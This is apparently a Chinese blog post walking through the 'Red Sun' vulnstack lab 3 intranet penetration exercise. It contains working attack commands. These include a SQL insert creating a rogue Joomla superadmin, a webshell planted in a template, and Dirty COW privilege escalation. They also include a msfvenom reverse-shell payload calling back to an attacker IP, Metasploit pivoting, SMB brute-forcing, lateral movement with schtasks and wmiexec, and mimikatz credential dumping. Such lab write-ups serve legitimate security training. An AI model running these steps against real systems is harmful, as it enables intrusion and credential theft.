内网渗透—红日靶场三

最新推荐文章于 2023-06-21 18:16:10 发布
最新推荐文章于 2023-06-21 18:16:10 发布
阅读量5.2k 收藏 14
点赞数 2
分类专栏: 渗透测试 文章标签: 渗透测试 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/124368342
版权

文章目录

0x01、环境配置

打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。

挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。

除重新获取ip,不建议进行任何虚拟机操作。

参考虚拟机网络配置,添加新的网络,该网络作为内部网络。

注:名称及网段必须符合上述图片,进行了固定ip配置。

描述

目标:域控中存在一份重要文件。

本次环境为黑盒测试,不提供虚拟机账号密码。

image-20220418183908131

image-20220419174835704

攻击机与Centos处于公网(桥接),其余机器与Centos处于同一内网

用Centos去ping其他内网机器查看是否网络畅通

0x02、Centos getshell

image-20220420001257456

image-20220419175005848

访问网站,发现是joomla的cms,可以使用kali扫描目录

joomscan -u 目标IP

image-20220419175224111

找到后台地址、robots.txt、配置文件等路径

image-20220419175729312

image-20220419175720198

在配置文件中发现数据库账号信息

image-20220419175907933

尝试使用远程管理工具连接数据库

image-20220419180100582

查后台用户名密码,通过搜索功能找到可能与用户账好信息有关的表

image-20220419180223230

得到一个超级用户的信息

image-20220419180251304

密码经过MD5加盐处理无法解密

此时可以通过cms官网查询管理员账户重置密码或创建新超级管理员方法

image-20220419180557229image-20220419180753902

INSERT INTO `jos31_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
    'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `jos31_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

注意修改表前缀

image-20220419180920712

此时发现已成功新建一个账户

image-20220419181035282

解密后得到新超管密码

登录后台后发现报错,但是不影响我们getshell

image-20220419194326967

在功能里发现了模板模块,众所周知,这个地方是getshell的多发点

image-20220419194516083

进入后新建一个文件或者直接修改当前存在文件,加上一句话后,访问即可getshell

image-20220419194919631

image-20220419194948295

回到刚刚报错,通过百度查询到这个原因是:检查php版本,代码中预设的版本日期都过期了,就是查找当前时间的版本找不到了,看下图

文件路径:/var/www/html/plugins/quickicon/phpversioncheck/phpversioncheck.php

image-20220419195116757

将日期修改即可

'7.3' => array(
			'security' => '2020-12-06',
			'eos'      => '2023-12-06',
		),

0x03、Centos提权

查看当前用户权限发现无法执行命令

image-20220419195515442

猜测是disable_functions禁用了一些可以执行命令或代码的函数。

在开始目录扫描时发现了一个1.php,进入后是phpinfo

image-20220419232112752

使用蚁剑插件

image-20220419200549463

修改刚才的连接

image-20220419200657741

再次执行命令,发现是低权限用户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-j7Ftq9J1-1650711340054)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220419201621975.png)]

查看对方ip发现网卡地址为192.168.93.120,与我们访问的IP(192.168.93.100)不同,猜测对方开启Nginx反向代理

image-20220419234024569

查看其它是否存在敏感文件,一般根目录下的tmp文件下会有重要信息

发现一个写有账号密码的文件

image-20220420000120243

之前的端口扫描中发现了22端口,尝试连接SSH,成功连上

image-20220420000245035

信息收集第一步—先看内核

uname -a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fGsnSxCm-1650711340055)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220420000400954.png)]

版本号大于2.6.32,可以使用脏牛漏洞提权

使用winscp传输文件

image-20220420001940108

对脏牛赋权并编译

chmod +x dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty root   //修改root账户,密码为root

提示已存在文件

rm /tmp/passwd.bak
./dirty root

image-20220420002649353

这里虽然用户名是firefart,但是执行id命令发现是root权限

image-20220420003610822

0x04、内网穿透—设置路由

kali中生成马并监听

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.63.43.7 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf

use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set lhost 0.0.0.0
set lport 6666
exploit

用root权限账号传输马到服务器上

image-20220420004709731

赋权并运行马

image-20220420004752505

成功上线

image-20220423150948938

查看路由

run get_local_subnets

image-20220420010240594

添加路由

run autoroute -s 192.168.93.0/24

run autoroute -p

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eSU5mpEM-1650711340058)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220420010334636.png)]

挂起

background

smb内网探测

use auxiliary/scanner/smb/smb_version
options
set rhosts 192.168.93.0/24
exploit

探测出三台windows主机

image-20220423151247431

image-20220423151258327

image-20220423151310565

0x05、内网穿透—设置代理

use auxiliary/server/socks_proxy
set VERSION 4a
set SRVHOST 10.63.43.7(攻击机)
exploit

记得修改配置文件

爆破smb

proxychains hydra -l administrator -P 字典 -s 445 192.168.93.20 smb

爆破得到administrator账号密码123qwe!ASD

image-20220423165413023

0x06、获取内网目标shell

通过smb拿shell

proxychains smbclient //192.168.93.20/c$ -U administrator

输入密码后成功登录

使用put命令可以传文件

image-20220423165454837

或者本地挂代理使用k8tools拿shell
在k8tools文件夹下打开终端

net use \\192.168.93.20\ipc$ "123qwe!ASD" /user:"administrator"
当提示命令完成后说明对方开始开启ipc连接

copy 本地文件地址 \\192.168.93.20\C$
添加计划任务
schtasks /create /tn "test" /tr C:\mimikatz.exe /sc once /st 17:00 /S 192.168.93.20 /RU System -U administrator /p "123qwe!ASD"

方法二
wmiexec.exe administrator:123qwe!ASD@192.168.93.20
输入?查看帮助

image-20220423170009422

image-20220423171130907

image-20220423171533025

image-20220423170704302

kali中wmiexec.py工具

下载地址:https://github.com/coresecurity/impacket/blob/masterexamples/wmiexec.py
需要先下载impacket工具包,这里面有很多工具
git clone http://github.com/CoreSecurity/impacket.git
cd impacket/
pip install
cd impacket-master/examples
安装成功后,切换到examples目录下,运行如下命令获取目标系统192.168.93.20的shell
proxychains python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'

设置远程桌面

reg add “HKLM\System\CurrentControls\Control\Terminal Server\WinStations\RDP-Tcp” /t REG_DWORD /v portnumber /d 3389 /f

开启远程桌面

wmic RDTOGGLE WHERE ServerName=‘%COMPUTERNAME%’ call SetAllowTSConnections 1

检查端口状态

net -an|find “3389”

image-20220423173106868

image-20220423174738873

使用msf生成马并监听,此时需要挂代理去开启msf

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=12345 -f exe > 1.exe

proxychains4 msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.93.20
set LPORT 12345
exploit

image-20220423175058426

此时可以看到两种方式上传的文件(mimikatz.exe和1.exe)

getuid

image-20220423182424446

使用猕猴桃抓取密码

load mimikatz

wdigest或kerberos

但是不知道到怎么回事没有抓回来

如果使用load kiwi需要system权限

load kiwi
creds_all
getsystem
getuid
creds_all

抓取密码

这里同样没有抓回来

其余思路同上

Shadow丶S
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透技术总结大全.pdf
12-22
渗透技术总结大全.pdf
安全靶场3
weixin_48169878的博客
07-13 4047
环境准备 1、所有虚拟机已经自动挂起。且内段为192.168.93.0\24,外段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0段,没有就创建。因为校园问题,桥接模式无法上,为了方便,外卡改为net模式,并配置192.168.1.0段,如下所示:修改kail的ip以及dns扫出来......
VulnStack-ATT&CK-3(靶场三)
buffedon的博客
07-12 8296
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内渗透信息收集脏牛漏洞提权内渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位域管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻域控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张卡(仅主
靶场第三关
红队是青春
11-18 5532
靶场第三关 一、环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出机,第一次运行,需重新获取桥接模式卡ip。 除重新获取ip,不建议进行任何虚拟机操作。 参考虚拟机络配置,添加新的络,该络作为内部络。 注:名称及段必须符合上述图片,进行了固定ip配置。 本次环境为黑盒测试,不提供虚拟机账号密码。 win10/kali:VMnet11 攻击机 web-centos:VMnet10、VMnet11 外 w
ATT&CK队评估(靶场三)
weixin_45682839的博客
04-25 3380
ATT&CK队评估(靶场三)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1151
靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
渗透攻击线路图.pdf
03-21
渗透攻击线路图.pdf
渗透思路整理与工具使用
12-08
渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在...
安全 ATT&CK VulnStack靶场(三)
baynk的博客
07-12 2817
0x00 前言 内真的有点难搞,总是会碰到一些奇怪的问题。。。基础不难,地动山摇。 不知道原版哪下的,就放个自己云盘的,这玩意压缩后只有20G,解压后有100G… 放个下载地址:提取码: uecu 拓扑图如下 除了centos的出口卡的IP是需要调整外,其余卡都不需要调整。 0x01 Web打点 直接访问站 发现很熟悉,joomla cms,国外比较有名的cms,直接上工具,kali里面带的joomscan [+] FireWall Detector [++] Firewall not det
ATT&CK 靶场(三)-简记
zhoufy的博客
06-21 1011
端口目录访问 ip/1.php -->根目录、禁用函数!!!-------IP/configuration.php~-->>发现 testuser / cvcvgjASD!更改密码->>123456Step 》写马->>eval($_POST['123']);-》访问error.php--antsward 连接后无法执行命令:antsward-》加载插件-》辅助工具-》绕过disable_fuctions-》PHP7_GC_UAF 、PHP7_Backtrace_UAF。
渗透靶场1
weixin_47781572的博客
10-10 1992
官方下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
渗透学习(三层络拓扑)靶场
叶子的Blog
05-05 3218
环境搭建 配置虚拟机卡 在Vmware中新增两个虚拟卡VMnet8、VMnet14。VMnet8设为默认的NAT模式,IP段设为192.168.52.0/24;VMnet14设为仅主机模式,IP段设为192.168.93.0/24 环境信息 DMZ区的 Ubuntu 需要启动redis和nginx服务: sudo redis-server /etc/redis.conf sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf sudo iptables -F
(vulnstack)3 内渗透ATT&CK实战
m0_66299232的博客
03-11 1563
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
渗透靶场1(ATK&CK队评估实战靶场一)
热门推荐
qq_45780190的博客
02-21 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 络拓扑 需要模拟内和外两个段, Win7 虚拟机相当于关服务器,所以需要两张卡,一个用来向外提供web服务,一个是通向内。添加络设配器如下图。 将 Win7 的络适配器 1 设置成 VMnet1 仅主机模式(内),络适配器 2 设置成 NAT 模式(外)。 而 Win2003、Win2008 络适配器设置成VMnet1仅主机模式
渗透测试之——靶机(一)
weixin_43072923的博客
04-25 693
靶机练习
ATT&CK3靶机渗透攻略
weixin_47311099的博客
01-27 5892
ATT&CK队评估三攻略 下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/5/ 启动:直接恢复运行,不建议重启!注意由于靶场封装时桥接的ip可能跟当前IP段不一样,故而需要在centos靶机中输入 service network restart 重启卡 信息收集 nmap扫描 nmap -sS -sV 192.168.111.0/24 开放了http80 ssh22 mysql3306 站信息收集 通过wapplayzer插
渗透靶场5
qq_48039118的博客
03-30 292
我是一名安小白,此篇文章如有错误,请评论指出!!!
靶场ping不通内
最新发布
08-17
3. IP地址冲突:检查内中是否存在与靶场IP地址冲突的情况。如果有IP地址冲突,可能会导致通信问题。 4. 络连接问题:检查您的络连接是否正常。尝试使用其他设备或络连接进行测试,以确定问题是否出现在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值